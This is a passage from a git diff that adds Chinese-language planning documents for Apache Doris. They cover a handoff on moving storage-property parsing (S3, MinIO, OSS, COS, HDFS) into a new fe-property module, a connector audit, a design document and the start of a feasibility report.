**60/60 绿**、fe-property `StoragePropertiesTest` 5/5 绿、`tools/check-connector-imports.sh` PASS、checkstyle 0、`mvn -pl :fe-connector-paimon -am package -Dassembly.skipAssembly=true` EXIT 0。(连接器 HiveConf 须 `package` 阶段=hive-shade;故用 `package -Dassembly.skipAssembly=true` 跑 UT。) + +**平价对齐:起步 57/60,3 处 divergence 按用户决策(保运行时行为=调 fe-property)已修:** +1. `fs.s3a.session.token` 漏 → fe-property `S3Properties` sessionToken 别名补 `AWS_TOKEN`(连接器有、legacy 无)。 +2. `minio.endpoint required` 抛 → 删 `MinioProperties.setEndpointIfPossible` 抛(lenient)。 +3. ak-without-sk 抛 → 删 `AbstractS3CompatibleProperties` 的 region/endpoint 必填抛 + ak/sk 一致性抛,并把 `fs.s3a.endpoint[.region]` 改**有值才发**(match 连接器宽松;conditional emit)。 + +**1 处 test 改(唯一反“保行为不变”的项,已在测试注释说明)**:`buildHadoopConfigurationEmitsCosRegionUnconditionally` 断言 `fs.cosn.bucket.region` 由 `""`→`ap-beijing`。原因=fe-property(=legacy) **从 `cos..myqcloud.com` 端点派生区域**(更正确),连接器旧 re-port 留空是简化;迁移后该 cosn catalog 得到正确区域(良性/更优)。 + +**M4 偏离记录(fail-loud,影响 fe-property 全体消费方)**:为对齐连接器宽松行为,fe-property 的 S3 兼容校验已**放宽**=不再因 region/endpoint 空而抛、不再强制 ak/sk 同设、endpoint/region 空则省略对应 fs.s3a key。这使 fe-property 比 legacy 宽松;未来 fe-core 迁入时若需严格校验需另行评估。 + +**仍未做**:① 引擎启动同步 `PropertyConfigLoader.hadoopConfigDir`/`AzureProperties.azureBlobHostSuffixes` 两静态(默认值对多数部署 OK);② docker e2e(`enablePaimonTest=true`)验 minio/oss/s3/cos/obs/dlf paimon catalog 真实读 + plugin-zip 实际 bundle 了 fe-property/fe-foundation(本地仅 UT+assembly 配置推断);③ 其它连接器(hive/iceberg/hudi)后续同法迁移。 + +## 已迁移连接器审计:es / jdbc / trino / maxcompute —— 是否有同类 storage-property 重复? —— 2026-06-15 + +**结论:四个都没有 storage-property 重复逻辑,无需迁移到 fe-property。** + +证据(`fe/fe-connector/fe-connector-{es,jdbc,trino,maxcompute}/src/main` 全量扫描): + +| 连接器 | 主类数 | `fs.s3a`/`fs.oss`/`fs.cosn`/`fs.obs`/`S3AFileSystem` | `StorageProperties`/`hadoop.conf.Configuration`/`applyCanonical*` | 引擎 storage 桥(`getBackendStorageProperties`/`normalizeStorageUri`/`vendStorageCredentials`) | 对象存储凭据别名(`minio.`/`s3.access`/`oss.access`/`AWS_ACCESS`) | 结论 | +|---|---|---|---|---|---|---| +| **es** | 20 | 无 | 无 | 无 | 无 | ES REST 直连(hosts/user/password/ssl/keyword_sniff/mapping),不读对象存储数据文件 → 无重复 | +| **jdbc** | 26 | 无 | 无 | 无 | 无 | JDBC 直连(jdbc_url/driver_url/driver_class/user/password/connection_pool_*),不读对象存储 → 无重复 | +| **trino** | 13 | 无 | 无 | 无 | 无 | Trino 元连接器,存储交由 Trino 自身连接器;唯一 hadoop 命中=注释 → 无重复 | +| **maxcompute** | 15 | 无 | 无 | 无 | 无 | ODPS 直连。`mc.access_key`/`mc.endpoint`/`mc.region`/`mc.session_token` 是 **ODPS SDK 凭据**(com.aliyun.odps),**非对象存储**;fe-property 不覆盖 ODPS。`bucket` 命中=MaxCompute tunnel 分片号,非存储桶 → 无重复 | + +**为什么**:这 4 个都是"直连活系统"连接器(ES / 关系库 / Trino / ODPS),数据不来自 S3/OSS 上的 parquet/orc 文件,所以从不构建 `fs.s3a.*` Hadoop storage config——这正是 paimon `applyStorageConfig` 那类重复的来源。`*ConnectorProperties` 都是纯连接器域常量持有类。 + +**真正会有该重复的是"读对象存储数据文件的湖仓连接器"**:paimon(已迁,本次)、以及 **hive / iceberg / hudi**(不在本次 4 个名单内,是后续 M-next 的候选;它们若有 `applyStorageConfig`-类手抄段,同法 Hybrid 迁移)。 + +--- + +## (以下为 M1-M3 原始 HANDOFF) + +## 1. 已完成(验证态) + +- **M1 模块骨架**:新建 `fe/fe-property`(artifactId `fe-property`,包 `org.apache.doris.property[.storage|.common]`);注册进 `fe/pom.xml` ``(fe-foundation 之后)+ dependencyManagement。 +- **M2 拷贝并重适配 storage**:24 个源文件搬入并改造(见 §3 改造清单)。 +- **M3 测试**:`StoragePropertiesTest` 5 用例(MinIO→fs.s3a.* 映射、MinIO→AWS_* 映射、S3 选型+URI 归一化、guessIsMe 顺序、HTTP 空配置)。 + +**验收证据:** +- `mvn -pl fe-property -am compile`:成功;**checkstyle 0**。 +- `mvn -pl fe-property -am package`:`doris-fe-property.jar`(96KB,26 class);`unzip -l` **不含** `org/apache/hadoop`、`software/amazon`、`com/amazonaws`、`org/apache/iceberg`、`org/apache/paimon`、`org/apache/hudi` —— **重依赖不进 jar ✓**。 +- `mvn -pl fe-property -am test`:`Tests run: 5, Failures: 0, Errors: 0, Skipped: 0`(surefire 报告确认真跑,已 `-Dmaven.build.cache.enabled=false`)。 +- fe-core 旧 `datasource/property` **零改动**(两套并存)。 + +## 2. 对外 API(连接器消费契约) + +```java +StorageProperties sp = StorageProperties.createPrimary(rawProps); // 或 createAll(...) +sp.getType(); // Type 枚举 +Map fsConf = sp.getHadoopConfigMap(); // fs.s3a.*/fs.cosn.*/fs.azure.*/dfs.* —— 连接器灌进自己的 Configuration +Map beProps = sp.getBackendConfigProperties(); // AWS_*/hadoop.* —— 发 BE +sp.validateAndNormalizeUri("s3a://b/k"); // -> "s3://b/k" +// + 各子类类型化 getter(getEndpoint/getRegion/getAccessKey/...) +``` +依赖:**仅 fe-foundation**(@ConnectorProperty 引擎/ParamRules/StoragePropertiesException)+ commons-lang3 + commons-collections4 + guava + log4j-api + **hadoop-common(provided)**。 + +## 3. 改造清单(相对 fe-core 旧 storage) + +1. 包 `org.apache.doris.datasource.property.*` → `org.apache.doris.property.*`(连接器 import-gate 禁 `datasource.*`)。 +2. **配置产物 Configuration → Map**:`Configuration hadoopStorageConfig` → `Map hadoopConfigMap` + `getHadoopConfigMap()`;所有 `conf.set` → `map.put`;FS impl 全是字符串字面量(无 hadoop 类型)。null map = 该后端无 hadoop 配置(如 HTTP),保留旧 skip 语义。 +3. `UserException`(fe-common) → `StoragePropertiesException`(fe-foundation,unchecked);S3URI 的 `new UserException(throwable)` → `(msg, cause)`。 +4. **S3Properties 剥离 fe-core 云/存储策略机器**:删 `getObjStoreInfoPB`(proto)、`getS3TStorageParam`(thrift)、`getCredProviderTypePB/getTCredProviderType`、`requiredS3Properties/checkRequiredProperty/requiredS3PingProperties/convertToStdProperties/optionalS3Property`(DdlException)、`getAwsCredentialsProvider V1/V2`(aws-sdk)、`Env` 内类 + 云常量。连接器自行用自带 SDK 构造凭据/PB。 +5. `getAwsCredentialsProvider`(aws-sdk) 从 AbstractS3Compatible + OSS/COS/OBS/GCS 移除;保留类型化凭据 getter + `AwsCredentialsProviderMode` 枚举(纯枚举)。 +6. **HdfsProperties/HdfsCompatibleProperties 去鉴权对象**:删 `HadoopAuthenticator` 构造 + `hadoopAuthenticator` 字段/getter(鉴权是连接器/引擎职责,走 `ConnectorContext.executeAuthenticated`);HDFS 仍解析 kerberos 属性进 map。 +7. **fe-common Config 解耦**:`Config.hadoop_config_dir` → `PropertyConfigLoader.hadoopConfigDir`(可设静态,默认 `$DORIS_HOME/plugins/hadoop_conf/`);`Config.azure_blob_host_suffixes` → `AzureProperties.azureBlobHostSuffixes`(可设静态,内联默认 8 项)。 +8. **loadConfigFromFile 保留并迁移**:新建 `PropertyConfigLoader`(hadoop `Configuration` 解析 XML,**hadoop-common=provided**);`ConnectionProperties.loadConfigFromFile` 改用它,仍返回 Map。 +9. `HdfsClientConfigKeys`(hadoop-hdfs-client)4 常量内联进 HdfsPropertiesUtils。 +10. `S3URI` 拷入 `org.apache.doris.property.storage`。 +11. `HttpProperties` 误引 `org.apache.hudi...MapUtils` → `commons-collections4.MapUtils`(`isNullOrEmpty`→`isEmpty`)。 + +## 4. 偏离设计/需注意(fail-loud) + +- **hadoop-common 是 provided(非"零 hadoop")**:设计文档曾期望零 hadoop;因首期纳入 `loadConfigFromFile`(须 hadoop 解析 XML 配置文件)而保留为 provided。**仍满足硬约束**(不进 jar,已验证)。唯一 hadoop 用处=`PropertyConfigLoader`/`loadConfigFromFile`;其余全 hadoop-free。若要彻底零 hadoop,可把 loadConfigFromFile 改注入式 loader(引擎提供)。 +- **S3 v2 凭据版本开关未移植**:`S3Properties.initializeHadoopStorageConfig` 只发默认(v1)assumed-role 配置(provider 类用 FQN 字符串硬编码)。`Config.aws_credentials_provider_version=v2` 的分支属 fe-core Config 行为,连接器场景不适用。 +- **引擎需在启动时同步两个可设静态**(否则用默认值):`PropertyConfigLoader.hadoopConfigDir = Config.hadoop_config_dir`、`AzureProperties.azureBlobHostSuffixes = Config.azure_blob_host_suffixes`。首期未接(默认值对绝大多数部署正确)。 +- **S3Properties 剥离的云/存储策略方法**:仅 fe-core legacy 调用,连接器不需要;保留在 fe-core 旧类(并存)。 + +## 5. 下一步(M4:paimon 连接器迁移,strangler-fig 阶段2) + +1. `fe-connector-paimon` pom 加 `fe-property` 依赖;plugin-zip assembly include `fe-property`(纯小 jar)。 +2. `PaimonCatalogFactory`:删 `applyStorageConfig`/`applyCanonicalMinioConfig`/OSS/COS/OBS 块/`MINIO_*_ALIASES` 重抄段,改 `StorageProperties.create(props).getHadoopConfigMap().forEach(conf::set)`。 +3. `tools/check-connector-imports.sh` 通过(fe-property 在允许包根)。 +4. paimon minio/oss/s3 回归(`external_table_p0/paimon`)证明重复消除 + 无行为回归。 +5. 引擎启动期同步 §4 的两个静态。 +6.(可选)更全的逐后端平价 sweep:新 `getHadoopConfigMap()`/`getBackendConfigProperties()` vs fe-core 旧 `getHadoopStorageConfig()`/`getBackendConfigProperties()` 逐键断言。 + +## 6. 文件清单(新增) + +``` +fe/fe-property/pom.xml +fe/fe-property/src/main/java/org/apache/doris/property/ + ConnectionProperties.java PropertyConfigLoader.java + common/AwsCredentialsProviderMode.java + storage/ (StorageProperties, AbstractS3CompatibleProperties, ObjectStorageProperties, + S3/OSS/COS/OBS/Minio/GCS/Ozone/Hdfs/HdfsCompatible/OSSHdfs/Azure/Broker/Local/Http Properties, + S3PropertyUtils, HdfsPropertiesUtils, AzurePropertyUtils, S3URI, exception/AzureAuthType) +fe/fe-property/src/test/java/org/apache/doris/property/storage/StoragePropertiesTest.java +fe/pom.xml (modules + dependencyManagement: +fe-property) +``` diff --git a/plan-doc/designs/fe-property-module-design-2026-06-15.md b/plan-doc/designs/fe-property-module-design-2026-06-15.md new file mode 100644 index 00000000000000..66411bb7f65312 --- /dev/null +++ b/plan-doc/designs/fe-property-module-design-2026-06-15.md @@ -0,0 +1,196 @@ +# 设计文档:独立 `fe-property` 模块(storage 优先,strangler-fig 并存迁移) + +> 日期:2026-06-15 | 分支:catalog-spi-07-paimon +> 前置研究:`plan-doc/reviews/property-module-extraction-feasibility-2026-06-14.md` +> 本设计遵循"先研究、后设计文档、批准后编码"流程。**编码尚未开始,待批准。** + +--- + +## 1. 目标(Goals) + +1. 新建独立 FE 模块 **`fe-property`**,承载"数据源属性的**整理 + 校验 + 归一化**"逻辑,**产出归一化结果**(类型化对象 + 归一化 Map),供各 connector / fe-core 复用。 +2. **彻底消除连接器侧的属性解析重复**:当前 `PaimonCatalogFactory` 因无法 import fe-core 的 `StorageProperties`,**手工重抄**了 `applyStorageConfig` / `applyCanonicalMinioConfig` / OSS/COS/OBS 块 / `MINIO_*_ALIASES`——这正是 `47bfe201c7c` minio bug 的来源。新模块让连接器改为直接调用,杜绝漂移。 +3. **最终 jar 不含重型依赖**(hadoop/hdfs/aws/iceberg/paimon)。本设计通过"只产出 Map、不构造 live 对象"从根上让这些重依赖**根本不进入**新模块(比 `provided` 更彻底)。 +4. **strangler-fig 并存**:**不动** fe-core 现有 `datasource/property`;新模块拷贝并重适配相关代码,两套并存;连接器逐个迁移到新模块;全部迁完后再删 fe-core 旧代码。 + +## 2. 非目标(Non-Goals) + +- 不重写/不删除 fe-core 现有 `org.apache.doris.datasource.property.*`(本期零改动)。 +- 首期**不**纳入 `metastore` 与 `fileformat`(仅 `storage`)。metastore 留作下一迭代(同样的纯解析范式),fileformat 不在连接器 catalog 属性范畴,暂不规划。 +- 新模块**不**构造任何 live 对象:不产出 Hadoop `Configuration`、不产出 aws-sdk `AwsCredentialsProvider`、不产出 iceberg/paimon `Catalog`、不产出 thrift `TS3StorageParam` / proto `ObjectStoreInfoPB`。这些由消费方(连接器/BE/fe-core)用各自已有的重型依赖构建。 +- 不改 BE。 + +## 3. 关键决策(已与用户确认) + +| 编号 | 决策 | 选择 | +|---|---|---| +| D1 | 对外形态 | **类型化对象 + 归一化 Map**:每个数据源解析成不可变 POJO(仅 String/基本类型字段),既有 getter,又提供 `getHadoopConfigMap()` / `getBackendPropertiesMap()` | +| D2 | 首期范围 | **仅 `storage`**(S3/OSS/COS/OBS/MinIO/GCS/Ozone/HDFS/OSS-HDFS/Azure/Broker/Local/Http) | +| D3 | 绑定/解析引擎 | **复用 fe-foundation 的 `@ConnectorProperty` 引擎**(`ConnectorPropertiesUtils.bindConnectorProperties` + `ParamRules`)。现 `StorageProperties` 已在用,零新增成本 | +| D4(派生)| 包根 | **`org.apache.doris.property`**(不可用 `datasource.*`,见约束 C1) | +| D5(派生)| 依赖上限 | 仅 `fe-foundation` + commons-lang3 + guava;**不依赖** fe-common/fe-core/fe-thrift/fe-grpc/hadoop/aws(见约束 C2) | + +## 4. 约束(Constraints) + +- **C1(包根硬约束)**:连接器 import-gate `tools/check-connector-imports.sh` 禁止连接器 import `org.apache.doris.(catalog|common|datasource|qe|analysis|nereids|planner).*`。因此新模块**不能**放在 `org.apache.doris.datasource.property`(`datasource.*` 被禁),改用 **`org.apache.doris.property.storage`**。`foundation.*` 不在黑名单,可放心依赖。 +- **C2(依赖上限)**:要让连接器可直接 import,新模块不得依赖被 gate 禁止的模块。即**不能用 `fe-common`**(无 `UserException` → 改用 `foundation.StoragePropertiesException`)。 +- **C3(no split-package)**:新包根 `org.apache.doris.property.*` 与旧 `org.apache.doris.datasource.property.*` 完全不同,两 jar 不会劈分同一包,并存合法。 +- **C4(连接器自带重依赖)**:连接器 plugin-zip 各自 child-first 自带 hadoop/aws/paimon。新模块产出的是 Map,连接器用自带的 hadoop/aws 把 Map 灌进 Configuration / 构造客户端。 + +## 5. 架构(Architecture) + +### 5.1 模块依赖图(首期) + +``` +fe-foundation (零重依赖:@ConnectorProperty 引擎 / ParamRules / StoragePropertiesException) + ▲ + │ compile + fe-property ←── 新模块(org.apache.doris.property.storage),仅 +commons-lang3/guava + ▲ + │ compile(连接器逐个加依赖) +fe-connector-paimon / -hive / -iceberg / …(各自带 hadoop/aws/SDK) + …(最终)fe-core 也可依赖 fe-property,迁完后删 fe-core 旧 property +``` + +构建顺序:`fe/pom.xml` 的 `` 把 `fe-property` 置于 `fe-foundation` 之后、`fe-connector` 之前;`fe-property` 只依赖 `fe-foundation`,Maven 依赖图自然满足。 + +### 5.2 并存与迁移(strangler-fig) + +``` +阶段0(现状): 连接器手工重抄 applyStorageConfig/minio ←─ 漂移源 +阶段1(本设计): 新建 fe-property(storage)。两套并存,fe-core 旧 property 不动。 +阶段2: paimon 连接器改用 fe-property(删 applyStorageConfig 重抄段)→ 回归验证。 +阶段3: hive/iceberg/hudi/... 连接器逐个迁移。 +阶段4: fe-core 非 SPI 旧 catalog 迁到 SPI 后亦改用 fe-property。 +阶段5: 所有使用方迁完 → 删除 fe-core org.apache.doris.datasource.property.storage。 +``` + +## 6. API / 接口设计 + +### 6.1 新 `StorageProperties` 契约(`org.apache.doris.property.storage`) + +保留(语义照搬旧类,仅换包/换异常): +- `static StorageProperties create(Map props)` —— 主存储(= 旧 `createPrimary`) +- `static List createAll(Map props)` +- `Type getType()` / `String getStorageName()` +- `String validateAndNormalizeUri(String url)` / `String validateAndGetUri(Map loadProps)` +- `@ConnectorProperty` 字段 + getter(endpoint/region/accessKey/secretKey/sessionToken/usePathStyle/maxConnections/...,按各子类) +- `enum Type` / `FS_*_SUPPORT` 常量 / `guessIsMe(...)` 工厂探测 + +**替换(核心改造)——把 live 对象换成 Map:** + +| 旧(fe-core,产出 live 对象/重类型) | 新(fe-property,产出 Map/纯类型) | +|---|---| +| `Configuration getHadoopStorageConfig()` | `Map getHadoopConfigMap()`(fs.s3a.*/fs.oss.*/fs.cosn.*/fs.obs.*/fs.azure.*/dfs.* 键值;连接器自行 `conf.set`) | +| `protected void initializeHadoopStorageConfig()`(写 Configuration 字段) | `protected void buildHadoopConfigMap()`(写内部 `Map` 字段) | +| `AwsCredentialsProvider getAwsCredentialsProvider()`(aws-sdk 类型) | **移除**;暴露类型化凭据 getter + `AwsCredentialsProviderMode` 枚举,连接器用自带 aws-sdk 构造 provider | +| `S3Properties.getObjStoreInfoPB()`(proto)/`getS3TStorageParam()`(thrift) | **不移植**(fe-core 云上/存储策略专属,留在旧 property) | +| `throws UserException`(fe-common) | `throws StoragePropertiesException`(fe-foundation) | + +保留并仍返回 Map(旧已是 Map,直接搬): +- `Map getBackendConfigProperties()` → 改名/保留为 `getBackendPropertiesMap()`(AWS_*/hadoop.* 规范键,给 BE) +- `Map getBackendConfigProperties(Map runtime)`(叠加运行时) + +### 6.2 连接器消费样例(minio 重复消失) + +```java +// 旧(PaimonCatalogFactory,手工重抄 ~150 行 applyStorageConfig/applyCanonicalMinioConfig/...) +applyStorageConfig(props, conf::set); + +// 新 +StorageProperties sp = StorageProperties.create(props); +sp.getHadoopConfigMap().forEach(conf::set); // fs.s3a.*/fs.oss.* 等,由 fe-property 统一推导 +// 需要发给 BE 时: +Map beProps = sp.getBackendPropertiesMap(); +``` + +## 7. 数据流(Data Flow) + +``` +用户 catalog/load props (raw Map) + │ + ▼ fe-property: StorageProperties.create(raw) +@ConnectorProperty 反射绑定 + ParamRules 校验 + guessIsMe 选型 + URI 归一化 + │ + ├── getHadoopConfigMap() → 连接器灌进自带 Configuration(catalog FS / SDK 客户端) + ├── getBackendPropertiesMap() → 连接器发给 BE(AWS_*/hadoop.* 规范键) + └── 类型化 getter → 连接器按需自取(如构造 aws provider / 取 endpoint) +``` + +## 8. 依赖与打包(pom) + +`fe-property/pom.xml`(仿 fe-foundation/fe-catalog 头): +- parent=`fe`(`${revision}`),packaging=jar,finalName=`doris-fe-property`,test-jar、javadoc skip、release source profile。 +- **compile**:`fe-foundation`(`${project.version}`)、`commons-lang3`、`guava`、`log4j-api`。 +- **可选 provided**:`hadoop-hdfs-client`(仅 `HdfsPropertiesUtils` 用 `HdfsClientConfigKeys` 的 4 个常量;二选一:①`provided`(不打包);②直接内联这 4 个 key 字符串,连这个依赖都省掉——**推荐内联**,使新模块零 hadoop 依赖)。 +- **无** hadoop-common / aws-sdk / iceberg / paimon / fe-common / fe-thrift / fe-grpc。 +- `fe/pom.xml`:`` 加 `fe-property`(fe-foundation 之后);dependencyManagement 加 `fe-property` 条目。 +- 连接器 plugin-zip 的 assembly 需 include `fe-property`(纯小 jar,无重依赖可打包)。 + +> 由于新模块本就不引入重型依赖,用户"重依赖不进 jar"的约束被**结构性满足**,无需依赖 `provided` 排除技巧。 + +## 9. 与现有 `ConnectorContext` 桥的关系 + +fe-core 现已在 `ConnectorContext` 暴露 `getBackendStorageProperties()` / `normalizeStorageUri()` / `vendStorageCredentials()`——让连接器"回调引擎做归一化"以绕开 import-gate。`fe-property` 让连接器**直接做**归一化(无需回调引擎),未来可逐步替代这些桥方法(含 vended:把 per-table token map 直接喂 `StorageProperties.create`)。**本期不动这些桥**,仅新增 fe-property 并迁移 `applyStorageConfig` 重抄段;桥方法待全面迁移后再评估下线。 + +## 10. 边界与坑(Edge Cases) + +1. **`S3URI`**:旧 `S3PropertyUtils` 依赖 fe-core 的 `common.util.S3URI`。新模块**拷贝** `S3URI` 进 `org.apache.doris.property.storage`(纯 java,仅把 UserException 换 StoragePropertiesException)。 +2. **HdfsClientConfigKeys**:见 §8,推荐内联 4 个 key 常量,避免 hadoop 依赖。 +3. **Azure OAuth**:旧 `AzureProperties` OAuth 分支构造 `Configuration`;新版产出 `fs.azure.account.oauth.*` Map。 +4. **鉴权(kerberos)**:旧 `HdfsProperties` 构造 `HadoopAuthenticator`(fe-common)。新版**只解析**鉴权属性(auth type / principal / keytab / 归一化 hadoop.* Map),**不构造** authenticator——authenticator 是运行时对象,由连接器/引擎(`ConnectorContext.executeAuthenticated`)负责。借此甩掉 fe-common 依赖。 +5. **`guessIsMe` 选型顺序**:MinIO 让位 Azure/COS/OSS/S3 的探测顺序需原样保留(否则误判后端)。 +6. **`HttpProperties` 误引**:旧版误 import `org.apache.hudi...MapUtils`;新版改 commons-collections4,避免拖 Hudi。 +7. **凭据 provider 构造下移**:`AwsCredentialsProviderFactory`(aws-sdk)不进 fe-property;连接器需要 provider 时自建(多数场景连接器只需把 Map 灌 Configuration / 发 BE,并不需要 provider 对象)。 + +## 11. 测试与回滚 + +- **平价测试(关键)**:对每个 storage 子类,用同一组 raw props 跑"新 `getHadoopConfigMap()`/`getBackendPropertiesMap()`" vs "旧 `getHadoopStorageConfig()` 转成 Map / `getBackendConfigProperties()`",断言**键值完全一致**(含 minio/oss/cos/obs/azure/hdfs)。这是防漂移的核心闸。 +- **单元测试**:选型 `guessIsMe` 顺序、URI 归一化、ParamRules 校验、各 alias 解析、minio.* 专属前缀检测。 +- **连接器迁移验证**:paimon 改用 fe-property 后,跑 `external_table_p0/paimon` 回归(minio/oss/s3 catalog 读)。 +- **回滚**:strangler-fig 天然可回滚——任一连接器迁移出问题,单独回退该连接器到旧 `applyStorageConfig`,fe-property 与旧 property 并存互不影响。 + +## 12. 风险与备选 + +- **风险1:平价漂移**。新 Map 推导若与旧 Configuration 落键有差→连接器/BE 行为变。缓解=§11 平价测试逐键断言;首迁 paimon 用真实 minio/oss 回归。 +- **风险2:代码拷贝双维护**。并存期 storage 逻辑两份。缓解=并存窗口尽量短、优先迁 paimon 验证范式、平价测试钉死一致;新代码为权威,旧代码进入"只读冻结"。 +- **风险3:plugin-zip 漏打 fe-property**。缓解=迁移连接器时同步改 assembly,加一条 smoke(plugin 加载 `org.apache.doris.property.storage.StorageProperties` 不 ClassNotFound)。 +- **备选A(被否)**:原地 lift-and-shift 整个 datasource.property → 循环依赖 + vendored glue + 重型 SDK,已证不可行(见前置研究报告)。 +- **备选B**:把新代码直接塞进 fe-foundation。否决——会破坏 fe-foundation 零依赖基座(即使首期 storage 很轻,后续 metastore 会重)。保持 fe-foundation 为纯基座,fe-property 为其上一层。 + +## 13. 有序 TODO 列表 + +**M1 — 模块骨架** +1. 新建 `fe/fe-property/pom.xml`(仿 fe-foundation;compile=fe-foundation+commons-lang3+guava+log4j-api)。 +2. `fe/pom.xml` `` 加 `fe-property`(fe-foundation 后);dependencyManagement 加条目。 +3. 建包 `org.apache.doris.property.storage`(+ `storage` 内 util)。 + +**M2 — 拷贝并重适配 storage(核心)** +4. 拷贝 `ConnectionProperties`(基类,去掉 `loadConfigFromFile` 对 fe-common 的依赖或改 foundation 等价)→ 新包。 +5. 拷贝 `StorageProperties` 抽象类:把 `getHadoopStorageConfig():Configuration` 改 `getHadoopConfigMap():Map`、`initializeHadoopStorageConfig()` 改 `buildHadoopConfigMap()`、`UserException`→`StoragePropertiesException`、`getBackendConfigProperties`→`getBackendPropertiesMap`。 +6. 拷贝 `AbstractS3CompatibleProperties` + `ObjectStorageProperties` + `Abstract*`:移除 `getAwsCredentialsProvider()`(aws-sdk),改产出凭据 getter;S3 系 fs.s3a.* 改写进 Map。 +7. 拷贝 13 个具体类(S3/OSS/COS/OBS/MinIO/GCS/Ozone/Hdfs/OSSHdfs/Azure/Broker/Local/Http):逐个把 `conf.set(...)` 改为 `map.put(...)`;保留 `guessIsMe` 顺序;修 HttpProperties 的 hudi 误引。 +8. 拷贝 util:`S3PropertyUtils`、`HdfsPropertiesUtils`(内联 `HdfsClientConfigKeys` 4 常量)、`AzurePropertyUtils`、**`S3URI`**(新拷贝)、`exception/AzureAuthType`。 +9. 移除 `S3Properties` 的 proto/thrift 方法(不移植)。 + +**M3 — 测试** +10. 平价测试:每个子类新 vs 旧逐键断言(依赖 fe-core 旧类做基准,可放 fe-property 的 test 或一个临时对照 test)。 +11. 单元测试:guessIsMe 顺序、URI 归一化、minio.* 检测、ParamRules、alias。 +12. checkstyle 0 告警。 + +**M4 — 首个连接器迁移(paimon,验证范式)** +13. `fe-connector-paimon` 加 `fe-property` 依赖;plugin-zip assembly include fe-property。 +14. `PaimonCatalogFactory`:删 `applyStorageConfig`/`applyCanonicalMinioConfig`/OSS/COS/OBS 块/`MINIO_*_ALIASES`,改为 `StorageProperties.create(props).getHadoopConfigMap().forEach(conf::set)`。 +15. 跑 import-gate(`tools/check-connector-imports.sh`)确认无违规;跑 paimon 回归(minio/oss/s3)。 + +**M5 — 文档与收尾** +16. 更新 plan-doc:迁移路线、并存说明、下线计划(metastore 下一迭代、桥方法评估)。 +17. 记录"旧 datasource.property.storage 冻结、以 fe-property 为权威"。 + +## 14. 验收标准(强约束,可独立 loop 验证) + +- `mvn -pl fe/fe-property -am package` 成功;`unzip -l doris-fe-property.jar` **不含** `org/apache/hadoop/**`、`software/amazon/**`、`org/apache/iceberg/**`、`org/apache/paimon/**`。 +- 平价测试全绿(新 Map ≡ 旧落键)。 +- `tools/check-connector-imports.sh` 通过;paimon 连接器删除 `applyStorageConfig` 后编译通过。 +- paimon minio/oss/s3 catalog 回归通过(证明重复消除且无行为回归)。 +- fe-core 旧 `datasource/property` 零改动(并存)。 diff --git a/plan-doc/reviews/property-module-extraction-feasibility-2026-06-14.md b/plan-doc/reviews/property-module-extraction-feasibility-2026-06-14.md new file mode 100644 index 00000000000000..3b7ee1c6fd3eb2 --- /dev/null +++ b/plan-doc/reviews/property-module-extraction-feasibility-2026-06-14.md @@ -0,0 +1,208 @@ +# `datasource/property` 独立成 FE Module —— 可行性分析报告 + +> 日期:2026-06-14 | 分支:catalog-spi-07-paimon +> 范围:`fe/fe-core/src/main/java/org/apache/doris/datasource/property/`(69 个 java 文件,约 10,389 行) +> 方法:7 个分析 agent 并行通读 + 2 个对抗式 verifier 复核 + 主线独立交叉验证(关键结论均有文件级证据) + +--- + +## 0. 结论速览(TL;DR) + +| 问题 | 结论 | +|---|---| +| **整个 `property/` 包整体搬出成一个 module?** | **不可行 / 代价过大**。`metastore` 子包(28 文件)直接构造 iceberg/paimon/hive/glue/dlf 的 catalog、直接 import 这些重型 SDK,并且 import 了 fe-core 的 `IcebergExternalCatalog/PaimonExternalCatalog/DLFCatalog`——而这三个类又**反向 import 了 property 包**,构成 Maven 无法接受的循环依赖;此外 Glue 客户端是**以源码形式 vendored 在 fe-core 里**(38 个 .java),根本没有可引用的 maven 坐标。 | +| **拆分:只把 `storage` + `common`(纯AWS部分) + `constants` + `ConnectionProperties` 搬出?** | **可行,中等工作量**。这部分**零 iceberg/paimon 依赖**,对 fe-core 的反向依赖只有 1 个(`common.util.S3URI`,自包含工具类,下沉即可),重型依赖只剩 hadoop + aws-sdk,可用 `provided` scope 排除出最终 jar。 | +| **重依赖如何不进最终 jar?** | 用 `provided`(编译期可见、不打包)。这正是用户的硬约束所要求的,且 fe-core 与各 SPI 插件运行时本就自带 hadoop/aws,late-binding 天然成立。 | +| **该并入现有 `fe-foundation` 吗?** | **不该**。`fe-foundation` 的 pom 只依赖 `fastutil-core`,零重依赖是它的立身之本(被 fe-catalog、fe-filesystem、SPI 插件当"轻基座"依赖)。塞入 hadoop/aws 会污染所有下游。应新建 `fe-property` 模块,依赖 `fe-foundation`。 | + +**一句话**:用户"把属性解析做成可复用 module"的诉求,对**最有复用价值的对象存储(storage)解析**是成立且推荐的——这恰好就是 minio 那个修复(`PaimonCatalogFactory` 重写 minio.* 解析)本应复用的部分;但 `metastore`(catalog 连接/构造)本质是 fe-core 领域逻辑、不是"通用属性解析",应留在 fe-core。 + +--- + +## 1. 背景与动机 + +`47bfe201c7c`(FIX-PAIMON-MINIO-STORAGE)在 SPI 连接器 `PaimonCatalogFactory` 里**重新实现**了一套 `minio.*` 属性识别逻辑,而同样的逻辑在 `datasource/property/storage/MinioProperties` 中早已存在。根因是:这套属性解析代码被关在 `fe-core` 内部,**module 外(如 fe-connector 的 SPI 插件)无法依赖复用**(fe-connector 还有 import-gate 禁止反向依赖 fe-core 内部)。因此用户希望把 `property/` 抽成独立 module 供各方复用,并要求**重型依赖(hadoop/hdfs/aws/iceberg/paimon…)不得出现在该 module 的最终 jar 里**。 + +本报告回答三件事:(1) 代码结构与职责;(2) 全部使用方清单;(3) 独立成 module 的可行性与落地方案。 + +--- + +## 2. 代码结构与职责理解 + +`property/` 下共 6 个区域,69 文件: + +| 子包 | 文件数 | 职责 | 重型第三方依赖 | 对 fe-core 反向依赖 | +|---|---|---|---|---| +| **`storage`** (+`storage/exception`) | 20+1 | 把原始属性 map 解析为**按后端分类的 `StorageProperties`**(S3/OSS/COS/OBS/MinIO/GCS/Ozone/HDFS/OSS-HDFS/Azure/Broker/Local/Http),产出 Hadoop `Configuration`、BE 配置 map、AWS `AwsCredentialsProvider`、规范化 URI | hadoop `Configuration`(类型)、aws-sdk-v2(凭据/STS/Region)、hadoop-hdfs-client(仅常量) | **仅 `common.util.S3URI`(1 处)** | +| **`metastore`** | 28 | 解析 catalog 连接属性,并**直接构造 iceberg/paimon/hive/glue/dlf 的 metastore 客户端/`Catalog` 对象**(两级注册工厂:`MetastoreProperties.create` → 家族工厂 → 具体 `*Properties`) | **iceberg、paimon、hive `HiveConf`、aws-sdk-v2、glue、aliyun 